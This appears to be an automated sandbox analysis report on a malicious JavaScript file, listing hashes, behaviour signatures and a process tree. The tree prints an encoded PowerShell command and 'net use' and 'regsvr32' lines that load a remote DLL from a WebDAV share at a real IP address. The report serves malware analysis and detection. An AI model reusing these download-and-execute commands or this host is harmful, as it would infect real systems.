Analysis
-
max time kernel
94s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21/11/2024, 10:04
Static task
static1
Behavioral task
behavioral1
Sample
1688429849263022239.js
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
1688429849263022239.js
Resource
win10v2004-20241007-en
General
-
Target
1688429849263022239.js
-
Size
720KB
-
MD5
6bb4dffdd348a4c3b1a2c22d6606e9f0
-
SHA1
f5d7853b07bf571a3ef736552ac9e7af914ec0b3
-
SHA256
99009e3c89f424fd01b517b2b644e587677c1bf42a3791d67ff8ec05e40eaace
-
SHA512
0000104cbda57ff9bd5ba38a6676c570f766465ded5a51adbd95753ec9bb78e664d31d92f91d266b8db7cf800262d235a6fd80da44654399db710ed7cb540b2d
-
SSDEEP
6144:I6G26HDfmyelKpU1lDA40K+SUbXeDA40K+SUbjTFrE1:ZG/TOKpU1+40K+SUbXR40K+SUbjTFrE1
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation wscript.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3588 powershell.exe 3588 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3588 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2324 wrote to memory of 3588 2324 wscript.exe 83 PID 2324 wrote to memory of 3588 2324 wscript.exe 83 PID 3588 wrote to memory of 3312 3588 powershell.exe 85 PID 3588 wrote to memory of 3312 3588 powershell.exe 85 PID 3588 wrote to memory of 2860 3588 powershell.exe 86 PID 3588 wrote to memory of 2860 3588 powershell.exe 86
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\1688429849263022239.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2324 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXAA5ADQALgAxADUAOQAuADEAMQAzAC4ANwA5AEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAA7AHIAZQBnAHMAdgByADMAMgAgAC8AcwAgAFwAXAA5ADQALgAxADUAOQAuADEAMQAzAC4ANwA5AEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADEAOAA0ADcAMQAyADAAMQA0ADIAMQA3ADQANwAuAGQAbABsAA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3588 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\94.159.113.79@8888\davwwwroot\3⤵PID:3312
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\94.159.113.79@8888\davwwwroot\218471201421747.dll3⤵PID:2860
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82